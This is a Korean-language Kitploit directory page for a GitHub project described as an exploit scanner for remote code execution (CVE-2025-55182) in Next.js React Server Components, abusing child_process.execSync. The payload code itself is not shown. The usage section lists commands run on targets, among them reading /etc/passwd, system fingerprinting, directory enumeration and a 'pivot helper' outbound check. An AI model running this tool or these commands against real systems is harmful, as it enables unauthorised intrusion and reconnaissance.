Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
POC-CVE-2025-55182 — POC-CVE-2025-55182 | Kitploit
도구/GitHubGitHub/devvaibhav07/poc-cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubdevvaibhav07/poc-cve-2025-55182

POC-CVE-2025-55182

POC-CVE-2025-55182

저장소 보기
8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 고급 스캐너

CVE-2025-55182 — Next.js의 React Server Components를 통한 원격 코드 실행(RCE)을 위한 완전한 기능을 갖춘 익스플로잇 유틸리티입니다. 이 스캐너는 multipart 페이로드를 자동으로 생성하고 process.mainModule.require('child_process').execSync()를 악용하여 취약한 인스턴스에서 임의의 OS 명령어 실행을 달성합니다.

기능

자동 페이로드 생성기 — 수동 인코딩 불필요 명령어 실행 및 STDOUT의 깔끔한 추출 자동 프로토콜 감지(누락 시 https:// 자동 적용) 정확한 URL 디코딩 + 개행 복원 신속한 운영자 피드백을 위한 컬러 출력 오류 핑거프린팅 (500 / 403 / SSL / 타임아웃 / WAF 패턴)

설치 chmod +x scanner.sh

사용법

기본 스캔 ('id' 실행)

./scanner.sh -d vulnerable-app.com

사용자 지정 명령어 실행

./scanner.sh -d vulnerable-app.com -c "whoami"

프로토콜을 명시하여 실행

./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

옵션 스크린샷 2025-12-09 16 13 23

예제

RCE 검증

./scanner.sh -d shop.example.com

시스템 핑거프린팅

./scanner.sh -d shop.example.com -c "uname -a"

쓰기 가능한 경로 열거

./scanner.sh -d shop.example.com -c "ls -la /var/www"

피벗 헬퍼 — 외부 접근 확인

./scanner.sh -d shop.example.com -c "ping -c 4 google.com"

부담 없이 mailto:[email protected]으로 연락 주세요.

도구 다운로드